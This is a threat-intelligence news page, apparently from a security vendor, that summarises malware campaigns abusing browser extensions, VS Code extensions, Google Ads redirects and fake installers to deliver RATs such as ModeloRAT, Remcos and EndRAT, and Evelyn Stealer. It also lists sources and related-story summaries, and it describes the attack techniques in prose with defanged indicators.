Malware campaigns abusing trusted software channels (browser extensions, developer tools, and Google Ads) to deliver RATs and stealers
Multiple active malware campaigns are abusing trusted distribution channels—including Chrome/Edge extensions, Visual Studio Code extensions, and Google Ads/redirection infrastructure—to trick users into executing payloads that deliver remote access trojans (RATs) or information stealers. Huntress reported a malvertising-driven fake ad blocker extension, NexShield, that intentionally forces Chrome/Edge into a crash/DoS state by looping chrome.runtime port connections; on restart it displays a fake “security warning” and uses a ClickFix-style social engineering flow (“CrashFix”) to push users to paste and run clipboard-copied commands that trigger an obfuscated PowerShell download-and-execute chain, ultimately deploying the Python-based ModeloRAT in corporate environments. Separately, Trend Micro described Evelyn Stealer delivered via a trojanized Visual Studio Code extension that drops a malicious Lightshot.dll side-loaded by legitimate Lightshot (Lightshot.exe), then runs staged PowerShell and payload retrieval to steal browser credentials, cookies, crypto wallets, VPN/Wi‑Fi data, files, and screenshots before exfiltrating to an attacker-controlled FTP server—posing elevated risk when developer workstations are compromised.
South Korea-focused activity also features prominently across several reports, with multiple delivery vectors leading to RAT deployment. ASEC documented Remcos RAT distributed via fake installers masquerading as VeraCrypt and via gambling-related “lookup” tools, using multi-stage obfuscated VBS/PowerShell chains and enabling credential theft, keylogging, and device surveillance (webcam/mic). Genians attributed “Operation Poseidon” to the Konni APT, describing spear-phishing that abuses Google’s advertising/tracking redirection (e.g., ad.doubleclick.net parameters) to make malicious links appear legitimate, redirecting victims to compromised WordPress infrastructure hosting ZIPs with LNK files that launch AutoIt-based loaders to run an EndRAT variant in memory. Nextron Systems reported widespread trojanized “free converter” apps promoted via malicious Google ads and lookalike converter sites (e.g., ez2convertapp[.]com, convertyfileapp[.]com), with some payloads signed using abused/rotating code-signing certificates (e.g., BLUE TAKIN LTD, TAU CENTAURI LTD, SPARROW TIDE LTD) to evade trust checks while installing persistent backdoors.
Get ahead of threats like this
Mallory correlates global threat intelligence with your attack surface — know if you’re exposed before adversaries strike.
How this story unfolded
6 events from the most recent confirmed update back to the earliest known activity.
Chrome Web Store removes malicious NexShield extension
Following discovery of the campaign, the malicious NexShield extension was removed from the Chrome Web Store. Huntress warned that removing the extension alone would not necessarily eliminate payloads already delivered to infected systems.
Fake NexShield browser extension used for ClickFix and ModeloRAT delivery
A malvertising campaign pushed a fake Chrome/Edge ad-blocking extension called NexShield that intentionally crashed browsers to trigger ClickFix-style social engineering. Victims were instructed to run malicious commands, leading to an obfuscated PowerShell chain and, on domain-joined corporate systems, deployment of the Python-based ModeloRAT.
Remcos RAT campaign uses fake VeraCrypt installers in South Korea
A malware campaign targeting South Korean users distributed Remcos RAT through deceptive installers masquerading as VeraCrypt and other utilities, including lures tied to illegal online gambling platforms. The infection chain used staged VBS and PowerShell downloaders, Discord webhooks, and process injection to deliver a full-featured remote access trojan capable of credential theft and surveillance.
Threat actors weaponize VS Code extensions to deploy Evelyn Stealer
Trend Micro reported a multistage malware campaign in which trojanized Visual Studio Code extensions compromised developer workstations. The attack used a fake DLL sideloading chain and PowerShell downloaders to deploy Evelyn Stealer, which exfiltrated credentials, tokens, crypto wallets, messaging sessions, and other sensitive data to attacker-controlled infrastructure.
Malicious converter apps spread via Google ads and fake websites
Nextron Systems reported a widespread malware campaign distributing trojanized file converter applications through deceptive Google advertisements and fake converter sites. The apps performed real conversion functions while covertly installing persistent RAT malware using code-signed binaries and scheduled tasks for follow-on payload delivery.
Konni APT runs Operation Poseidon against South Korean organizations
A spear-phishing campaign dubbed Operation Poseidon targeted South Korean organizations with lures themed around North Korean human rights groups and financial institutions. The activity was attributed to the Konni APT group and used Google ad click-tracking redirects, compromised WordPress sites, ZIP archives, LNK files, and AutoIt scripts to load an EndRAT variant in memory.
Related entities
Vulnerabilities, threat actors, malware, products, organizations, and breaches Mallory has linked to this story.
Sources
5 references tracked. Mallory keeps watching after this page renders.
Fake ad blocker extension crashes the browser for ClickFix attacks
bleepingcomputer.com
Open sourceRemcos RAT Masquerade as VeraCrypt Installers Steals Users Login Credentials
cybersecuritynews.com
Open sourceThreat Actors Weaponizing Visual Studio Code to Deploy a Multistage Malware
cybersecuritynews.com
Open sourceNew Spear-Phishing Attack Abusing Google Ads to Deliver EndRAT Malware
cybersecuritynews.com
Open sourceFree Converter Apps that Convert your Clean System to Infected in Seconds
cybersecuritynews.com
Open sourceSee the full picture, correlated to your attack surface.
Map indicators from this story to your assets and identify affected systems in minutes.
Every observed campaign, victim, and pivot linked to actors named in this story.
Malware, exploits, and IOCs connected to the activity described here.
YARA, Sigma, and Snort rules deployed to your SIEM as soon as they’re published.
Get matching new stories delivered to your team as they break — not the next morning.
Ask questions about this story and take action on the answers.
Related stories
Other stories Mallory is tracking that overlap on entities, sources, or topic labels.
Malware Delivery via Deceptive Lures: Malvertising, Fake Recruitment Repos, and Phishing Dropping RATs
Multiple reports detail **social-engineering-driven malware delivery** that results in **remote access trojans (RATs)** and credential theft. Infoblox described observing an affiliate push-notification ad network after exploiting misconfigured DNS delegations (“**Sitting Ducks**”/lame name server delegation) to take over abandoned threat-actor domains, allowing collection of **~57M logs** over two weeks and visibility into widespread **scams and brand impersonation** delivered via push ads. Nextron Systems separately reported recurring **malvertising** chains where “free converter” tools (e.g., document/image converters) downloaded from ads on legitimate sites function as advertised while covertly installing **persistent RATs**, with common artifacts such as Windows **Mark-of-the-Web** (`ZoneId=3`) indicating internet origin. Other activity in the set reflects different initial-access lures but the same general outcome—RAT-style access and data theft. Fortinet analyzed a **phishing** campaign using a fake Vietnam shipping document: a Word attachment leads to an RTF stage that exploits an RTF-related vulnerability, then uses **VBScript/PowerShell** to load a **fileless .NET module**, ultimately downloading and injecting a **Remcos** variant (including process hollowing) to provide full remote control. Separately, reporting on North Korea’s **“Contagious Interview”** campaign described fake recruiter outreach (e.g., via LinkedIn) that tricks developers into opening malicious code repositories; execution can be triggered via a hidden **VS Code `tasks` configuration**, server-side logic hooks, or a malicious npm dependency to steal credentials/crypto wallets and establish persistence—this is thematically similar (social engineering leading to remote access) but is a distinct operation from the malvertising/push-ad and Remcos phishing activity.
Mar 21, 2026
Windows Malware Campaigns Using Social Engineering and Legitimate Platforms to Deliver RATs, Stealers, and Proxyware
Multiple research reports detailed **Windows-focused malware delivery chains** that rely on social engineering and abuse of legitimate services to blend into normal enterprise traffic. FortiGuard Labs described a **multi-stage campaign targeting users in Russia** that starts with business-themed decoy documents and scripts, then escalates to security-control bypass and surveillance before deploying **Amnesia RAT** and ultimately **ransomware** with widespread file encryption. A notable technique in that intrusion is the abuse of **Defendnot** (a Windows Security Center trust-model research tool) to **disable Microsoft Defender**, while payloads are hosted modularly across public cloud services (e.g., **GitHub** for scripts and **Dropbox** for binaries) to improve resilience and complicate takedowns. Separately, ReliaQuest reported attackers using **LinkedIn private messages** to build trust with targets and deliver a **WinRAR SFX** that triggers **DLL sideloading** via a legitimate PDF reader, then establishes persistence (Registry `Run` key) and executes **Base64-encoded shellcode in-memory** to load a RAT-like payload. Trend Micro and Koi Security documented **Evelyn Stealer**, which weaponizes **malicious VS Code extensions** to drop a downloader DLL (e.g., `Lightshot.dll`), run hidden PowerShell to fetch `runtime.exe`, and inject the stealer into `grpconv.exe`, exfiltrating data (credentials, cookies, wallets, screenshots, Wi‑Fi credentials) to `server09.mentality[.]cloud` over FTP. AhnLab ASEC also reported **proxyjacking** activity in South Korea attributed to **Larva‑25012**, distributing **proxyware disguised as a Notepad++ installer** and evolving evasion (e.g., injecting into Windows Explorer and using Python-based loaders) to monetize victims’ bandwidth via unauthorized proxyware installation.
Mar 21, 2026
Multiple malware campaigns using compromised websites and phishing lures to deliver RATs and stealers
Threat actors are using **compromised or spoofed websites** to trick victims into executing malware, with lures ranging from fake browser updates to counterfeit security-software download pages. Recorded Future’s Insikt Group reported that financially motivated **GrayCharlie** (overlapping with **SmartApeSG**) compromised multiple U.S. law-firm WordPress sites—potentially via a shared IT/marketing provider—and injected externally hosted JavaScript that redirected visitors to **bogus update pages** or **fake CAPTCHA** flows. Victims were prompted to run a PowerShell command via the Windows Run dialog, leading to **NetSupport RAT** installation and follow-on delivery of **Stealc** and **SectopRAT**; the operation’s infrastructure was noted as being supported by **MivoCloud** and **HZ Hosting Ltd.** Separately, Malwarebytes-linked reporting described a **typosquatting** campaign impersonating the Huorong antivirus site (`huoronga[.]com` vs. `huorong.cn`) to distribute **ValleyRAT** (built on the **Winos4.0** framework), attributed to the Chinese-speaking **Silver Fox APT**; the payload was routed through an intermediary domain and hosted on **Cloudflare R2**, with a ZIP masquerading as Huorong (`BR火绒445[.]zip`). In a different region and access vector, Group-IB reported Iran-linked **MuddyWater** running **Operation Olalampo** against MENA targets using **phishing emails** with malicious Office documents/macros to deploy new tooling including **GhostFetch** (dropping **GhostBackDoor**) and **CHAR** (a Rust backdoor controlled via a **Telegram bot**), plus variants using **HTTP_VIP** to deploy *AnyDesk*; the campaign also leveraged recently disclosed vulnerabilities on public-facing servers for initial access.
Mar 21, 2026